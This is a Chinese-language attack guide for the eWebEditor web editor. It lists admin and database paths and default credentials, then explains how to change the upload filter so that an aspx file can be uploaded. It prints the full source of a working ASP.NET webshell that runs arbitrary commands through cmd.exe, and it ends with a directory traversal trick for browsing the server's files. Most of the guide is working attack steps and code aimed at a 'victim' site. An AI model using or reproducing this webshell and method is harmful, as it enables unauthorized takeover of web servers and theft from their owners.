eWebEditor 的一些利用方式

开发文档

http://www.ewebeditor.net/documentation/
http://www.ewebeditor.net/

常见路径

ewebeditor/Admin_Login.asp
Admin_Login.asp # 登录页面
Admin_Default.asp  # 管理首页
Admin_Style.asp
Admin_UploadFile.asp
Upload.asp
Admin_ModiPwd.asp
eWebEditor.asp
db/ewebeditor.mdb # 默认数据库路径
login_admin.asp

管理入口

http://www.victim.com/ewebeditor/admin/login.aspx
http://127.0.0.1/ewebeditor/admin_login.asp

默认的用户名和密码是

admin/admin
admin/admin888

其他

提供御剑字典一枚

等待更新

已登录后台 getshell

带图的 详细资料 请查看2017年7月渗透测试报告归档。

选择样式管理-设置，修改上传图片的后缀名限制，允许上传aspx文件。

以下为JspSpy的核心代码，将该文件保存为webshell.aspx上传。

<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<script Language="c#" runat="server">
    protected void FbhN(object sender,EventArgs e) {
      try {
          Process ahAE=new Process();
          ahAE.StartInfo.FileName=kusi.Value;
          ahAE.StartInfo.Arguments=bkcm.Value;
          ahAE.StartInfo.UseShellExecute=false;
          ahAE.StartInfo.RedirectStandardInput=true;
          ahAE.StartInfo.RedirectStandardOutput=true;
          ahAE.StartInfo.RedirectStandardError=true;
          ahAE.Start();
          string Uoc=ahAE.StandardOutput.ReadToEnd();
          Uoc=Uoc.Replace("<","&lt;");
          Uoc=Uoc.Replace(">","&gt;");
          Uoc=Uoc.Replace("\r\n","<br>");
          tnQRF.Visible=true;
          tnQRF.InnerHtml="<hr width=\"100%\" noshade/><pre>"+Uoc+"</pre>";
      } catch(Exception error) {
          Response.Write(error.Message);
      }
    }
</script>

<HTML>
  <HEAD>
  <title>awen asp.net webshell</title>
  </HEAD>
  <body>
    <form id="cmd" method="post" runat="server">
    <div runat="server" id="vIac">
      <p>
        路径:<br/>
        <input class="input" runat="server" id="kusi" type="text" size="100" value="c:\windows\system32\cmd.exe"/>
      </p>
      参数:<br/>
      <input class="input" runat="server" id="bkcm" value="/c Set" type="text" size="100"/> <asp:Button ID="YrqL" CssClass="bt" runat="server" Text="Submit" OnClick="FbhN"/>
      <div id="tnQRF" runat="server" visible="false" enableviewstate="false"></div>
    </div>
    </form>
  </body>
</HTML>

默认上传路径为

http://www.victim.com/ewebeditor/uploadfile/20170718171925327.aspx

访问该路径即获得 webshell。

历史漏洞

目录遍历

登陆编辑器—上传文件管理—选择样式目录(随便选一个目录)
得到:
ewebeditor/admin_uploadfile.asp?id=14
在id=14后面添加&dir=..
再加 &dir=../..
&dir=../../../.. 看到整个网站文件了。

参考资料

Ewebeditor编辑器漏洞总结 Cracer
http://cracer.com/?p=366